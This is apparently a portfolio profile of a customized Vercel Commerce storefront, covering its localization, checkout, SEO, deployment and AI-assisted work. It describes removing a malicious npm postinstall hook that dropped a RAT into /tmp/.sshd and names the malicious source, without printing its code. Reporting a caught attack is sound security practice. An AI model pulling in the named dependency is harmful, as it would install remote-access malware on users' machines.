E-commerce Storefront — Supply-Chain RAT Caught

• What it is: e-commerce storefront based on Vercel Commerce (multi-provider headless commerce: bigcommerce/shopify/saleor/swell/vendure/local). Fork deeply customized for a specific store: Russian localization, reworked checkout (Dodo-style two-column, pickup-by-branch, payment methods), homepage slider/categories, SEO redirects, CRM scripts, deployment (PM2/nginx).
• Type / status / role: web-app (commerce storefront) / active / contributor (fork: upstream — Vercel/Luis Alvarez/Belen ~850 commits; user Davron+variants — ~802 commits of customization; also shahaa/Shahzod ~212).
• Active period: history starts 2020-09-21 (Vercel upstream) → 2026-05-26; active customization — 2025-2026.

• Vercel Commerce (Next.js Commerce): providers in framework/ (bigcommerce active per codegen), GraphQL + codegen (codegen.json, codegen.bigcommerce.json), commerce.config.json.
• Next.js (app/ — App Router; components + components_new — rewrite), Tailwind, i18n (i18n/, messages/, locales/ — ru/...), next-intl.
• Infra: deploy.sh, nginx.conf, ecosystem.config.js (PM2), Bun (bun.lockb).
• Integrations: crm-scripts/, custom backend API (UZ store: branches/pickup/payment).
• AI: .claude/, .superpowers/ (superpowers skills), CLAUDE.md, SEO-TASKS.md.

Upstream customization (conventional commits):

• Checkout redesign: Dodo-style two-column, sticky order summary (card), pickup 3-col grid, payment methods 4-col, group line-items, fixes for fixed-header (6f735b96, d261cd18, 43df713e…).
• Homepage: merging slider and sticky category-nav into a "capsule", native aspect-ratio of slide (layout fixes via plain CSS, since Tailwind 2 has no arbitrary aspect) (feeb7751, ebb0d72a, 35d3bc5c).
• SEO: redirect /ru[/*] → canonical un-prefixed URL (404 fix per audit) (11cc5633), SEO-TASKS.md.
• i18n: Russian storefront localization.
• Security: 2e06e1cc security: remove malicious postinstall hook (supply-chain RAT dropping /tmp/.sshd via parikhpreyash4/gvfsd-network) — detected and removed malicious postinstall hook (npm supply-chain RAT).
• Volume: 2175 commits total (with upstream), ~802 by user.

• Supply-chain attack intercept (2e06e1cc): detected and removed malicious postinstall hook of a dependency (parikhpreyash4/gvfsd-network) that dropped a RAT into /tmp/.sshd. → real security vigilance (dependency audit, response to a supply-chain threat) — the strongest and rarest signal for the brand.
• Headless-commerce customization for a local market: pickup-by-branch, local payment systems, ru-i18n over English Vercel Commerce. → adapting a Western starter kit to UZ realities.
• Layout under legacy stack constraints (35d3bc5c, 3a01f516): found that components.css wasn't imported in app/layout.tsx (rule never reached the browser); worked around missing arbitrary-aspect in Tailwind 2 via plain CSS. → debugging real CSS-pipeline bugs.
• SEO hygiene: locale-URL canonicalization, removing 404s per audit.

• Sessions found: 77 .jsonl. .superpowers/ (superpowers skills), .claude/.
• What was done with AI: checkout/layout/SEO iterations, likely dependency audit. Heavy AI-assist for customization.
• Pattern: Claude Code + superpowers skills; task-driven SEO-TASKS.md.

• Real production store on Vercel Commerce, deeply customized (~802 commits).
• Supply-chain RAT intercept (security).
• ru-localization, checkout redesign, SEO.